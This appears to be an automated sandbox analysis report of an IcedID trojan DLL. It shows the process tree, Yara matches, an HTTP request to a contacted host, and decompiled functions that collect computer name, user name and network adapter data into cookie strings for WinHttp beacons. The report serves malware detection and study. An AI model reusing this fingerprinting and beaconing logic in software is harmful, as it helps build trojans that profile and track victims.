    Host: alexbionka.com
    Aug 12, 2022 00:28:22.168242931 CEST93INHTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 11 Aug 2022 22:28:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0


    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Target ID:0
    Start time:00:28:07
    Start date:12/08/2022
    Path:C:\Windows\System32\loaddll64.exe
    Wow64 process (32bit):false
    Commandline:loaddll64.exe "C:\Users\user\Desktop\y2D56.tmp.dll"
    Imagebase:0x7ff6a02b0000
    File size:140288 bytes
    MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:1
    Start time:00:28:08
    Start date:12/08/2022
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Imagebase:0x7ff602050000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:2
    Start time:00:28:08
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:3
    Start time:00:28:08
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
    • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    Reputation:high

    General

    Target ID:4
    Start time:00:28:12
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,MVeMOgOlu
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:5
    Start time:00:28:15
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,OnqcowdLVOpj
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:6
    Start time:00:28:18
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",JfUksQmDGYQRSQfC
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:7
    Start time:00:28:19
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",MVeMOgOlu
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:9
    Start time:00:28:19
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",OnqcowdLVOpj
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:11
    Start time:00:28:20
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",aXXRQNg
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:12
    Start time:00:28:21
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",agetCYHzlW
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Reset < >

      Execution Graph

      Execution Coverage:4.9%
      Dynamic/Decrypted Code Coverage:83.6%
      Signature Coverage:42.7%
      Total number of Nodes:225
      Total number of Limit Nodes:20
      execution_graph 5965 7ffa65c56271 5966 7ffa65c5623f 5965->5966 5966->5965 5967 7ffa65c5620e NtCreateSection 5966->5967 5970 7ffa65c5621e 5966->5970 5971 7ffa65c56594 5967->5971 5968 7ffa65c566a7 NtMapViewOfSection 5968->5970 5969 7ffa65c566d4 5970->5968 5970->5969 5972 180002aa4 5975 180002174 5972->5975 5976 180002190 SleepEx 5975->5976 5976->5976 5977 1800021b4 wsprintfW 5976->5977 5978 1800021d1 5977->5978 5992 180002860 GetProcessHeap RtlAllocateHeap 5978->5992 5981 1800021e5 6007 180001d80 wsprintfW 5981->6007 5982 18000224e 5987 180002232 6028 180001b5c GetProcessHeap HeapAlloc 5987->6028 5988 18000221e GetProcessHeap HeapFree 5988->5987 5993 1800028a1 wsprintfW wsprintfW 5992->5993 5994 1800021e0 5992->5994 6087 180001484 GetTickCount64 5993->6087 5994->5981 5994->5982 5996 1800028e7 wsprintfW 6038 18000108c 5996->6038 6000 18000292f 6059 1800027b4 6000->6059 6002 18000293b 6062 180002018 GetComputerNameExW 6002->6062 6006 180002956 6006->5994 6014 180001db5 6007->6014 6009 180001e2e 6010 180001e33 GetProcessHeap HeapFree 6009->6010 6011 180001e27 6009->6011 6010->6011 6011->5982 6016 180001198 6011->6016 6012 180001e06 GetProcessHeap HeapFree 6013 180001e1a Sleep 6012->6013 6013->6014 6014->6009 6014->6011 6014->6012 6014->6013 6119 180001b08 6014->6119 6122 180001760 6014->6122 6017 180001211 6016->6017 6018 1800011a9 6016->6018 6017->5987 6017->5988 6018->6017 6151 180001688 SHGetFolderPathA 6018->6151 6021 1800011cb GetLastError 6021->6017 6022 1800011dc 6156 180001000 GetTempPathA 6022->6156 6025 1800011ed GetLastError 6025->6017 6026 1800011ff 6163 180002268 6026->6163 6029 180001bc2 6028->6029 6030 180001b92 6028->6030 6029->5982 6033 180002480 wsprintfW 6029->6033 6031 1800014b4 6 API calls 6030->6031 6032 180001ba4 wsprintfW 6031->6032 6032->6029 6034 180001b08 19 API calls 6033->6034 6035 1800024ca 6034->6035 6036 1800024f0 6035->6036 6037 1800024dc GetProcessHeap HeapFree 6035->6037 6036->5982 6037->6036 6043 1800010a3 6038->6043 6039 1800010a8 LoadLibraryA GetProcAddress 6040 1800010cd NtQuerySystemInformation 6039->6040 6041 180001135 6039->6041 6042 180001131 6040->6042 6040->6043 6049 180001153 GetProcessHeap HeapFree 6041->6049 6050 18000112f wsprintfW 6041->6050 6042->6041 6045 18000116b 6042->6045 6043->6039 6043->6040 6044 1800010f5 GetProcessHeap 6043->6044 6043->6050 6047 18000111a RtlAllocateHeap 6044->6047 6048 18000110c HeapReAlloc 6044->6048 6046 180001170 GetProcessHeap HeapFree 6045->6046 6045->6050 6046->6050 6047->6043 6048->6043 6049->6050 6051 180001904 6050->6051 6052 18000192d LoadLibraryA GetProcAddress 6051->6052 6053 180001953 6052->6053 6054 18000199a wsprintfW wsprintfW 6052->6054 6053->6054 6057 18000195e wsprintfW wsprintfW 6053->6057 6055 1800019da wsprintfW 6054->6055 6088 180001bd4 6055->6088 6057->6055 6092 180002c88 6059->6092 6063 180002062 6062->6063 6099 1800014b4 6063->6099 6066 1800020a1 6067 1800014b4 6 API calls 6066->6067 6068 1800020be 6067->6068 6069 1800014b4 6 API calls 6068->6069 6070 1800020d4 6069->6070 6105 180001c28 GetComputerNameExW 6070->6105 6073 180002144 wsprintfW 6076 180002142 6073->6076 6074 1800020ff wsprintfW 6075 18000213d 6074->6075 6075->6076 6077 180002117 wsprintfW 6075->6077 6078 18000133c LoadLibraryA GetProcAddress 6076->6078 6077->6075 6079 180001388 GetAdaptersInfo 6078->6079 6080 1800013df 6078->6080 6079->6080 6081 180001396 6079->6081 6080->6006 6081->6080 6082 18000139f GetProcessHeap HeapAlloc 6081->6082 6082->6080 6083 1800013bd GetAdaptersInfo 6082->6083 6084 1800013cb GetProcessHeap HeapFree 6083->6084 6085 180001414 6083->6085 6084->6080 6086 18000145f GetProcessHeap HeapFree 6085->6086 6086->6080 6087->5996 6089 180001bea LoadLibraryA GetProcAddress 6088->6089 6090 1800019ff wsprintfW 6089->6090 6091 180001c0e GetNativeSystemInfo 6089->6091 6090->6000 6091->6090 6093 180002cb5 6092->6093 6096 180002ac0 6093->6096 6097 180002adb SwitchToThread SwitchToThread 6096->6097 6097->6097 6098 1800027cb wsprintfW wsprintfW wsprintfW wsprintfW 6097->6098 6098->6002 6100 1800014d7 6099->6100 6115 180001604 lstrlenW 6100->6115 6103 18000154c GetProcessHeap HeapFree 6104 180001560 GetUserNameW 6103->6104 6104->6066 6106 180001d68 6105->6106 6107 180001c60 LookupAccountNameW 6105->6107 6106->6073 6106->6074 6107->6106 6108 180001c96 GetLastError 6107->6108 6108->6106 6109 180001ca5 6108->6109 6109->6106 6110 180001cb0 GetProcessHeap HeapAlloc 6109->6110 6110->6106 6111 180001cd6 LookupAccountNameW 6110->6111 6112 180001d54 GetProcessHeap HeapFree 6111->6112 6114 180001d08 GetProcessHeap HeapFree 6111->6114 6112->6106 6114->6106 6116 180001627 GetProcessHeap HeapAlloc 6115->6116 6118 1800014f9 6115->6118 6117 180001647 WideCharToMultiByte 6116->6117 6116->6118 6117->6118 6118->6103 6118->6104 6128 1800024fc WinHttpOpen 6119->6128 6123 18000178e 6122->6123 6125 1800018de 6122->6125 6124 180001801 GetProcessHeap HeapAlloc 6123->6124 6123->6125 6126 180001827 6123->6126 6124->6125 6124->6126 6125->6014 6126->6125 6127 1800018ca GetProcessHeap HeapFree 6126->6127 6127->6125 6129 180001b54 6128->6129 6131 180002556 6128->6131 6129->6014 6130 180002574 WinHttpConnect 6133 180002594 WinHttpOpenRequest 6130->6133 6134 180002790 WinHttpCloseHandle 6130->6134 6131->6130 6132 180002568 WinHttpSetStatusCallback 6131->6132 6132->6130 6135 180002787 WinHttpCloseHandle 6133->6135 6136 1800025e8 6133->6136 6134->6129 6135->6134 6137 18000260b WinHttpSendRequest 6136->6137 6138 1800025ed WinHttpSetOption 6136->6138 6139 18000277e WinHttpCloseHandle 6137->6139 6140 18000263f WinHttpReceiveResponse 6137->6140 6138->6137 6139->6135 6140->6139 6141 180002652 WinHttpQueryHeaders WinHttpQueryHeaders 6140->6141 6142 1800026b6 WinHttpQueryDataAvailable 6141->6142 6143 180002734 6142->6143 6144 1800026ca 6142->6144 6145 180002760 6143->6145 6149 18000274c GetProcessHeap HeapFree 6143->6149 6144->6142 6144->6143 6146 1800026d7 GetProcessHeap 6144->6146 6150 18000270f WinHttpReadData 6144->6150 6145->6139 6147 1800026fc HeapAlloc 6146->6147 6148 1800026ee HeapReAlloc 6146->6148 6147->6144 6148->6144 6149->6145 6150->6143 6150->6144 6152 1800016e1 6 API calls 6151->6152 6153 1800016da 6151->6153 6173 180002a18 CreateFileA 6152->6173 6153->6152 6157 180001042 lstrcatA 6156->6157 6158 180001038 6156->6158 6159 180001061 6157->6159 6158->6157 6160 180002a18 CreateFileA 6159->6160 6161 1800011e9 6160->6161 6162 180002a5b WriteFile CloseHandle 6160->6162 6161->6025 6161->6026 6162->6161 6176 180001f2c lstrcpyA SHGetFolderPathA 6163->6176 6166 180002311 GetProcessHeap HeapAlloc 6167 180002338 6166->6167 6172 1800023f3 6166->6172 6167->6167 6168 180002415 6167->6168 6169 1800023d5 6167->6169 6182 180002b5c VirtualAlloc 6168->6182 6171 1800023df GetProcessHeap HeapFree 6169->6171 6169->6172 6171->6172 6172->6017 6174 1800011c7 6173->6174 6175 180002a5b WriteFile CloseHandle 6173->6175 6174->6021 6174->6022 6175->6174 6177 180001f95 lstrcatA 6176->6177 6178 180001f86 lstrcpyA 6176->6178 6179 180001fa2 lstrcatA lstrcpyA 6177->6179 6178->6179 6180 180001ff6 6179->6180 6181 180001fe0 lstrcpyA 6179->6181 6180->6166 6180->6167 6180->6172 6181->6180 6183 180002b95 GetLastError 6182->6183 6185 180002baa 6182->6185 6184 180002c00 6183->6184 6184->6172 6185->6184 6193 180001e64 6185->6193 6188 180002c16 GetLastError 6188->6184 6189 180002c28 6190 180002c56 6189->6190 6191 180002c2d VirtualProtect 6189->6191 6190->6184 6192 180002c63 GetLastError 6190->6192 6191->6190 6191->6191 6192->6184 6194 180001f08 6193->6194 6197 180001e8a 6193->6197 6194->6188 6194->6189 6195 180001e97 LoadLibraryA 6195->6194 6195->6197 6196 180001ed0 GetProcAddress 6196->6194 6196->6197 6197->6194 6197->6195 6197->6196 6198 7ffa65c531f1 LoadLibraryW 6199 7ffa65c53201 6198->6199 6200 7ffa65c53147 6198->6200 6199->6198 6199->6200 6201 7ffa65c536fa 6203 7ffa65c53708 6201->6203 6202 7ffa65c536ec 6203->6201 6203->6202 6204 7ffa65c53834 RtlAllocateHeap 6203->6204 6204->6202 6204->6203 6205 180001b08 6206 1800024fc 19 API calls 6205->6206 6207 180001b54 6206->6207 6208 180001318 6209 180001329 6208->6209 6210 180001332 ExitProcess 6209->6210 6211 18000131e SleepEx 6209->6211 6211->6209 6231 7ffa65c55fe6 6232 7ffa65c55fdd 6231->6232 6233 7ffa65c55fed 6231->6233 6234 7ffa65c5620e NtCreateSection 6233->6234 6235 7ffa65c5621e 6233->6235 6236 7ffa65c56594 6234->6236 6235->6232 6237 7ffa65c566a7 NtMapViewOfSection 6235->6237 6237->6235 6212 18000244c 6213 180002474 6212->6213 6214 180002455 CreateThread 6212->6214 6214->6213 6224 7ffa65c55ff9 6225 7ffa65c56173 6224->6225 6226 7ffa65c5620e NtCreateSection 6225->6226 6227 7ffa65c5621e 6225->6227 6230 7ffa65c5616d 6225->6230 6226->6230 6228 7ffa65c566a7 NtMapViewOfSection 6227->6228 6229 7ffa65c566d4 6227->6229 6228->6227 6215 21281d00000 6216 21281d00036 6215->6216 6217 21281d00127 GetNativeSystemInfo 6216->6217 6222 21281d004e1 6216->6222 6218 21281d0015f VirtualAlloc 6217->6218 6217->6222 6219 21281d0017d 6218->6219 6219->6219 6220 21281d002f1 LoadLibraryA 6219->6220 6223 21281d00341 6219->6223 6220->6219 6221 21281d004bd VirtualProtect 6221->6223 6223->6221 6223->6222

      Executed Functions

      Function 00000001800024FC Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 198memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Http$Heap$CloseHandleQuery$AllocDataHeadersOpenProcessRequest$AvailableCallbackConnectFreeOptionReadReceiveResponseSendStatus
      • String ID: GET$POST
      • API String ID: 1614834629-3192705859
      • Opcode ID: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
      • Instruction ID: f84e999ab61f2fbba52d9160ce5dc28e4838b3332290d6c6070ea75f8e9928f1
      • Opcode Fuzzy Hash: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
      • Instruction Fuzzy Hash: A881A972304B8987EBA6CF66E800BD937A5FB4CBD4F448129AE0957B54DF38C698C704
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000000018000133C Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 87memorylibraryloaderCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 24%
      			E0000000118000133C(long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				void* _t16;
				void* _t19;
				int _t21;
				void* _t27;
				long long* _t35;
				void* _t49;
				long long* _t55;
				long long* _t57;
				void* _t63;
				void* _t64;
				struct HINSTANCE__* _t65;
				CHAR* _t68;

				_t35 = _t57;
				 *((long long*)(_t35 + 8)) = __rbx;
				 *((long long*)(_t35 + 0x18)) = __rbp;
				 *((long long*)(_t35 + 0x20)) = __rsi;
				 *(_t35 + 0x10) =  *(_t35 + 0x10) & 0;
				LoadLibraryA(_t68); // executed
				GetProcAddress(_t65);
				_t55 = _t35;
				if (_t35 == 0) goto 0x800013df;
				_t16 =  *_t55(); // executed
				if (_t16 != 0x6f) goto 0x800013df;
				if (__rbx == 0) goto 0x800013df;
				GetProcessHeap();
				HeapAlloc(??, ??, ??);
				if (_t35 == 0) goto 0x800013df;
				_t19 =  *_t55(); // executed
				if (_t19 == 0) goto 0x80001414;
				GetProcessHeap();
				_t21 = HeapFree(??, ??, ??);
				r9d = 1;
				return E00000001180001578(_t21, 0, _t27, __rbx, __rcx, L"; _gid=", _t35, 0x800070bc, _t63, _t64, _t49);
			}
















      0x18000133c
      0x18000133f
      0x180001343
      0x180001347
      0x180001367
      0x18000136a
      0x18000137a
      0x180001380
      0x180001386
      0x18000138f
      0x180001394
      0x18000139d
      0x18000139f
      0x1800013af
      0x1800013bb
      0x1800013c5
      0x1800013c9
      0x1800013cb
      0x1800013d9
      0x1800013df
      0x180001413

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$Process$AdaptersFreeInfo$AddressAllocLibraryLoadProc
      • String ID: ; _gid=$GetAdaptersInfo$IPHLPAPI.DLL
      • API String ID: 3866128989-336904856
      • Opcode ID: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
      • Instruction ID: b75e3b5367209cd78c64b13d950b78932923334006a58f125620b5977970df53
      • Opcode Fuzzy Hash: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
      • Instruction Fuzzy Hash: 55317872600B88DAEB96DB22F4443D973A1AB4DBC5F48C025EA0D0A765DF38C64EC300
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000000018000108C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 77memorylibrarynativeCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$Process$Free$AddressAllocAllocateInformationLibraryLoadProcQuerySystem
      • String ID: NTDLL.DLL$ZwQuerySystemInformation
      • API String ID: 2948972359-2445179936
      • Opcode ID: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
      • Instruction ID: c553ab603bbb7ea155e402bcf953277eb51bc389a09fd2bd74e1016edb044849
      • Opcode Fuzzy Hash: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
      • Instruction Fuzzy Hash: 5B313E72715A89C6FADADB56A8043D972A1AB4CBC2F48C034FB0957754EF3CCA4D8705
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180002018 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 81COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 48%
      			E00000001180002018(long long __rbx, void* __rcx, signed long long __rdx, long long __rdi, long long __rsi) {
				void* __rbp;
				void* _t32;
				int _t34;
				void* _t35;
				void* _t37;
				void* _t43;
				void* _t45;
				signed long long _t51;
				signed long long _t54;
				signed long long _t81;
				void* _t85;
				WCHAR* _t87;
				void* _t88;
				signed long long _t90;
				void* _t91;
				WCHAR* _t100;
				WCHAR* _t102;

				_t51 = _t90;
				 *((long long*)(_t51 + 0x10)) = __rbx;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				 *((long long*)(_t51 + 0x20)) = __rdi;
				_t88 = _t51 - 0x168;
				_t91 = _t90 - 0x250;
				_t81 = __rdx;
				 *((intOrPtr*)(_t88 + 0x170)) = 0x100;
				_t85 = __rcx;
				__imp__GetComputerNameExW(); // executed
				if (_t32 != 0) goto 0x8000206a;
				 *((intOrPtr*)(_t91 + 0x40)) = 0x78;
				E000000011800014B4(_t32, _t45, __rbx, __rcx, L"; _u=", __rcx, _t88, _t91 + 0x40);
				 *((intOrPtr*)(_t88 + 0x170)) = 0x100;
				_t54 = _t51; // executed
				_t34 = GetUserNameW(_t102); // executed
				if (_t34 != 0) goto 0x800020a9;
				 *((intOrPtr*)(_t91 + 0x40)) = 0x78;
				_t35 = E000000011800014B4(_t34, _t45, _t54, _t85 + _t54 * 2, ":", _t85, _t88, _t91 + 0x40);
				_t55 = _t54 + _t51;
				E000000011800014B4(_t35, _t45, _t54 + _t51, _t85 + (_t54 + _t51) * 2, ":", _t85, _t88, __rdx);
				_t37 = E00000001180001C28(_t43, _t51, _t55 + _t51, _t85 + (_t54 + _t51) * 2, _t91 + 0x20);
				r14d = _t37;
				if (_t37 == 0) goto 0x80002144;
				r9d =  *((intOrPtr*)(_t91 + 0x20));
				wsprintfW(_t100);
				goto 0x8000213d;
				r9d =  *((intOrPtr*)(_t91 + 0x20 + _t81 * 4));
				wsprintfW(_t87);
				if (_t81 + 1 - _t100 < 0) goto 0x80002117;
				goto 0x80002153;
				r9d = 0;
				return wsprintfW(??, ??);
			}




















      0x180002018
      0x18000201b
      0x18000201f
      0x180002023
      0x18000202c
      0x180002033
      0x18000203a
      0x18000203d
      0x180002047
      0x180002058
      0x180002060
      0x180002062
      0x180002079
      0x180002085
      0x180002094
      0x180002097
      0x18000209f
      0x1800020a1
      0x1800020b9
      0x1800020be
      0x1800020cf
      0x1800020e1
      0x1800020e6
      0x1800020fd
      0x1800020ff
      0x180002104
      0x180002115
      0x180002117
      0x18000212e
      0x180002140
      0x180002142
      0x180002144
      0x180002172

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: wsprintf$Name$ComputerUser
      • String ID: %s%u$; __io=$; _u=$x
      • API String ID: 4095488650-3513353778
      • Opcode ID: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
      • Instruction ID: 7d741998cccdb29629df25af753f6537b3149e73fb9b8afa304b05458abafeeb
      • Opcode Fuzzy Hash: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
      • Instruction Fuzzy Hash: A73149B2704A8992EBA2CB11E8443D97370F75C7C5F948126EA4D5B665EF3CC60EC740
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0000000180001C28 Relevance: 15.1, APIs: 10, Instructions: 93memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
